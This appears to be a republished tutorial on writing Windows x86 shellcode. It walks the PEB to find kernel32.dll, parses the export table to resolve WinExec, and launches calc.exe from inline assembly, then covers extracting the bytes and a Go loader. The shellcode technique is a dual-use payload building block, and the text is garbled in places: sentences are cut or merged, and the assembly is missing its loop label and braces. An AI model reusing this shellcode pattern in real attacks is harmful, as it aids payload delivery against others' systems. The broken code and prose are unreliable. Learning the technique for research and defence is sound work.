This article was first published on the Xianzhi Community.
What is Shellcode?
Shellcode is a specially designed, position-independent binary code that is typically used as a payload in exploits to perform specific operations, such as spawning a shell or gaining control over a system.
To write position-independent code, the following points should be taken into account:
The string must be stored dynamically on the stack.
Function Addressing in DLLs: Due to ASLR (Address Space Layout Randomization), DLLs do not load at the same address every time. You can locate loaded modules through PEB.PEB_LDR_DATA to call their exported functions or load a new DLL.
Avoid Null Bytes: A
byte (0x00
) is treated as a string terminator in C/C++ code. IfNULL
bytes appear in the shellcode, they may interfere with the functionality of the target application, and the shellcode might fail to copy correctly into ebx, 0x00
you can use the following equivalent instruction to avoid null bytes:xor ebx, ebx
. -
Character Restrictions: In certain scenarios, shellcode must also avoid characters like \r or \n and may even need to use alphanumeric-only characters.
The Mechanism Behind DLL Loading on Windows
In Windows, applications cannot directly access system calls. Instead, they use functions from the Windows API (WinAPI), which are stored in DLLs such as kernel32.dll
, advapi32.dll
, gdi32.dll
, etc. ntdll.dll
and kernel32.dll
are especially important, as every process imports them.
Here is the program I wrote, called nothing_to_do. I used listdlls to list the imported DLLs.
DLL Addressing
The TEB (Thread Environment Block) structure contains thread information in user mode. On 32-bit systems, we can use the FS
register to find the address of the PEB (Process Environment Block) at offset 0x30
points to the PEB_LDR_DATA
structure, which contains information about the loaded modules, including the base addresses of kernel32
and ntdll
typedef struct _PEB_LDR_DATA {
BYTE Reserved1[8];
PVOID Reserved2[3];
LIST_ENTRY InMemoryOrderModuleList;
contains the head of a doubly linked list of the modules loaded in the process. Each entry in the list is a pointer to an LDR_DATA_TABLE_ENTRY
typedef struct _LIST_ENTRY
Information about the loaded DLL in LDR_DATA_TABLE_ENTRY
typedef struct _LDR_DATA_TABLE_ENTRY {
PVOID Reserved1[2];
LIST_ENTRY InMemoryOrderLinks;
PVOID Reserved2[2];
PVOID DllBase;
PVOID EntryPoint;
PVOID Reserved3;
BYTE Reserved4[8];
PVOID Reserved5[3];
union {
ULONG CheckSum;
PVOID Reserved6;
ULONG TimeDateStamp;
In Windows versions prior to Vista, the first two DLLs inInInitializationOrderModuleList
, but for Vista and later versions, the second DLL is changed tokernelbase.dll
t, the first entry iscalc.exe
(the executable), the second isntdll.dll
, and the third iskernel32.dll
. This method currently applies to all versions of Windows and is the preferred approach.
Kernel32.dll Addressing Process:
Implementing with Assembly Code:
xor ecx, ecx
mov ebx, fs:[ecx + 0x30] ; *ebx = PEB base address
mov ebx, [ebx+0x0c] ; ebx = PEB.Ldr
mov esi, [ebx+0x14] ; ebx = PEB.Ldr.InMemoryOrderModuleList
lodsd ; eax = Second module
xchg eax, esi ; eax = esi, esi = eax
lodsd ; eax = Third(kernel32)
mov ebx, [eax + 0x10] ; ebx = dll Base address
Function Addressing in Kernel32.dll Export Table
Previously, I studied PE structure-related materials here.
points to the Export Table RVA. The structure of the Export Table is as follows:
typedef struct _IMAGE_EXPORT_DIRECTORY {
DWORD Characteristics;
DWORD TimeDateStamp; // Timestamp
WORD MajorVersion;
WORD MinorVersion;
DWORD Name; // Pointer to the export table's filename string
DWORD Base; // Starting ordinal of the export table
DWORD NumberOfFunctions; // Number of exported functions (more accurately, the number of elements in AddressOfFunctions, not the number of functions)
DWORD NumberOfNames; // Number of functions exported by name
DWORD AddressOfFunctions; // Exported function address table RVA: stores the addresses of all exported functions (table element width is 4, total size is NumberOfFunctions * 4)
DWORD AddressOfNames; // Exported function names table RVA: stores the addresses of function name strings (table element width is 4, total size is NumberOfNames * 4)
DWORD AddressOfNameOrdinals; // Exported function ordinal table RVA: stores the function ordinals (table element width is 2, total size is NumberOfNames * 2)
Implementing with Assembly Code:
;; Find PE export table
mov edx, [ebx + 0x3c] ; Find the e_lfanew offset in the DOS header
add edx, ebx ; edx = pe header
mov edx, [edx + 0x78] ; edx = offset export table
add edx, ebx ; edx = export table
mov esi, [edx + 0x20] ; esi = offset names table
add esi, ebx ; esi = names table
;; Find the `Winexec` Function Name
xor ecx, ecx
inc ecx ; ecx++
lodsd ; eax = Next function name string RVA
add eax, ebx ; eax = Function name string pointer
cmp dword ptr[eax], 0x456E6957 ; eax[0:4] == EniW
jnz Get_Function
dec ecx;
;;Find the Winexec Function Pointer
mov esi, [edx + 0x24] ; esi = ordianl table rva
add esi, ebx ; esi = ordianl table
mov cx, [esi + ecx * 2] ; ecx = func ordianl
mov esi, [edx + 0x1c] ; esi = address table rva
add esi, ebx ; esi = address table
mov edx, [esi + ecx * 4] ; edx = func address rva
add edx, ebx ; edx = func address
;; Call the Winexec Function
xor eax, eax
push edx
push eax ; 0x00
push 0x6578652e
push 0x636c6163
push 0x5c32336d
push 0x65747379
push 0x535c7377
push 0x6f646e69
push 0x575c3a43
mov esi, esp ; esi = "C:\\Windows\\System32\\calc.exe"
push 10 ; window state SW_SHOWDEFAULT
push esi ; "C:\\Windows\\System32\\calc.exe"
call edx ; WinExec(esi, 10)
Final Code:
int main()
__asm {
; Find where kernel32.dll is loaded into memory
xor ecx, ecx
mov ebx, fs:[ecx + 0x30] ; *ebx = PEB base address
mov ebx, [ebx+0x0c] ; ebx = PEB.Ldr
mov esi, [ebx+0x14] ; ebx = PEB.Ldr.InMemoryOrderModuleList
lodsd ; eax = Second module
xchg eax, esi ; eax = esi, esi = eax
lodsd ; eax = Third(kernel32)
mov ebx, [eax + 0x10] ; ebx = dll Base address
;; Find PE export table
mov edx, [ebx + 0x3c] ; Find the e_lfanew offset in the DOS header
add edx, ebx ; edx = pe header
mov edx, [edx + 0x78] ; edx = offset export table
add edx, ebx ; edx = export table
mov esi, [edx + 0x20] ; esi = offset names table
add esi, ebx ; esi = names table
;; Find the `Winexec` Function Name
xor ecx, ecx
inc ecx ; ecx++
lodsd ; eax = Next function name string RVA
add eax, ebx ; eax = Function name string pointer
cmp dword ptr[eax], 0x456E6957 ; eax[0:4] == EniW
jnz Get_Function
dec ecx;
;;Find the Winexec Function Pointer
mov esi, [edx + 0x24] ; esi = ordianl table rva
add esi, ebx ; esi = ordianl table
mov cx, [esi + ecx * 2] ; ecx = func ordianl
mov esi, [edx + 0x1c] ; esi = address table rva
add esi, ebx ; esi = address table
mov edx, [esi + ecx * 4] ; edx = func address rva
add edx, ebx ; edx = func address
;; Call the Winexec Function
xor eax, eax
push edx
push eax ; 0x00
push 0x6578652e
push 0x636c6163
push 0x5c32336d
push 0x65747379
push 0x535c7377
push 0x6f646e69
push 0x575c3a43
mov esi, esp ; esi = "C:\\Windows\\System32\\calc.exe"
push 10 ; window state SW_SHOWDEFAULT
push esi ; "C:\\Windows\\System32\\calc.exe"
call edx ; WinExec(esi, 10)
; exit
add esp, 0x1c
pop eax
pop edx
return 0;
It was compiled using Visual Studio
, resulting in a very large size. By rewriting it in MASM
, I was able to produce a much smaller file: shellcode.asm.
Extract Shellcode
Compile MASM:
F:\\> ml -c -coff .\\shellcode.asm
F:\\> link -subsystem:windows .\\shellcode.obj
There are two methods to extract shellcode:
- Use dumpbin.exe:
$ dumpbin.exe /ALL .\\shellcode.obj
- Extract the PE .text section Data: starting from PointerToRawData, and retrieve data of size VirtualSize:
Shellcode Loader
Write a loader in Golang, code: loader.go. Compile using the Makefile, and the run it: